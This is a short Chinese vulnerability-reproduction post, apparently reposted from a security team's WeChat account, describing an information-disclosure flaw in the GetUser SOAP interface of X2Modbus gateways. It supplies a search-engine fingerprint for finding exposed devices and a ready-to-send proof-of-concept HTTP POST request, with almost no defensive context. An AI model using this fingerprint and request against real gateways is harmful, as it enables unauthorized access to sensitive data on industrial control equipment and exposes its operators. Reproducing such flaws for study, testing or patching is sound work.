漏洞概述
X2Modbus网关GetUser接口存在信息泄漏漏洞,使得未经授权的用户或攻击者可以获取敏感信息。
资产测绘
server="SunFull-Webs" || icon_hash="-1384370370"
POC
POST /soap/GetUser HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded
<GetUser><User Name="admin" Password="admin"/></GetUser>
原文始发于微信公众号(零点安全团队):【漏洞复现】X2Modbus网关--信息泄露
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论